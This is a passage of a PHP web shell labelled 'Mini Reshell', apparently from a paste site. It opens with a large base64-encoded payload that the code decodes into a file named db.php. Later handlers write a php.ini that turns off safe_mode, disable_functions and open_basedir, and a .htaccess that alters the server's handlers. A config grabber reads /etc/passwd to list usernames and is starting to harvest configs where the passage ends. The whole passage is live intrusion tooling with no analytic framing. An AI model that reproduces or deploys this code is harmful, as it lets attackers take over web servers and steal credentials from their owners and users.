aDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
  600. file_put_contents("db.php",base64_decode($script));
  601. echo "<script>alert('done! check db.php'); hideAll();</script>";
  602. echo "<p><center><font color=green>Check = >> <a href='db.php' target=_blank><b>db.php</b></a></font></center>
  603.  
  604.  
  605.  
  606. </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  607. <br><center>$nick Mini Reshell</center> ";
  608. die();
  609. }
  610. //create php.ini for safe mode
  611. elseif ( $pilih == 'phini') {
  612. $byht = "safe_mode = Off
  613. disable_functions = None
  614. safe_mode_gid = OFF
  615. open_basedir = OFF
  616. allow_url_fopen = On";
  617. file_put_contents("php.ini",$byht);
  618. echo "<script>alert('php.ini Created'); hideAll();</script>";
  619. die();
  620. }
  621. //forbiden
  622. elseif ( $pilih == 'forbid') {
  623. $hateaces = "AddHandler application/x-httpd-php4 .php .php4 .php3
  624. Options +FollowSymLinks +Indexes
  625. DirectoryIndex default.html
  626. AddType text/html php
  627. Options +ExecCGI
  628. AddHandler cgi-script cgi pl xt
  629.  
  630. AddHandler cgi-script cgi pl tg love h4 tgb cbg lta izo vic
  631.  
  632. DirectoryIndex Sux.html
  633. AddType text/plain .php
  634. AddHandler server-parsed .php
  635. AddType text/plain .html
  636. AddHandler txt .html
  637. Require None
  638. Satisfy Any";
  639. file_put_contents(".htaccess",$hateaces);
  640. echo "<script>alert('.htaccess Created'); hideAll();</script>";
  641. die();
  642. }
  643. }
  644. }
  645. ?>
  646.  
  647.  
  648.  
  649. <?php
  650. //itachi quotes
  651. if(isset($_GET['beby']) && ($_GET['beby'] == 'quotes')){
  652. ?>
  653.  
  654. <br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Itachi Quotes </th></tr><td>
  655. Kita Tidak Tahu Orang Seperti Apa Kita Sebenarnnya, Sampai Di Saat Detik-Detik Kematian Kita Tiba....<br>Saat Itulah Kita Akan Tahu Orang Seperti Apa Kita Sebenarnya !!
  656. </td></tr></table>
  657.  
  658.  
  659. <?php
  660. }
  661. //contfig grabber
  662. if(isset($_GET['beby']) && ($_GET['beby'] == 'config'))
  663. {
  664. ?>
  665. <form action="?beby=config" method="post">
  666. <br>
  667.  
  668. <form method=post><font color=white size=2 face="Tahoma">Create php.ini</font><p>
  669. <input type=submit name=ini value="use to Generate PHP.ini" /></p></form>
  670. <form method=post><font color=white size=2 face="Tahoma">Search Username</font><p>
  671. <input type=submit name="usre" value="use to Extract usernames" /></p></form>
  672.  
  673.  
  674. <?php
  675. //php.ini
  676. if(isset($_POST['ini']))
  677. {
  678. $r=fopen('php.ini','w');
  679. $rr="safe_mode=OFF
  680. disable_functions=NONE";
  681. fwrite($r,$rr);
  682. $link="<a href=php.ini><font color=white size=2 face=\"Tahoma\"><u>buka di newtab PHP.INI</u></font></a>";
  683. echo $link;
  684. }
  685. ?>
  686.  
  687.  
  688. <?php
  689. //user
  690. if(isset($_POST['usre'])){
  691. ?><form method=post>
  692.  
  693. <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
  694. foreach($users as $user)
  695. {
  696. $str=explode(":",$user);
  697. echo $str[0]."\n";
  698. }
  699. ?></textarea>
  700.  
  701. <br><br>
  702.  
  703. <input type=submit name=su value="Grabber Now !!" /></form>
  704.  
  705. <?php } ?>
  706.  
  707. <?php
  708. //config
  709. error_reporting(0);
  710. if(isset($_POST['su']))
  711. {
  712. mkdir('hkc',0777);
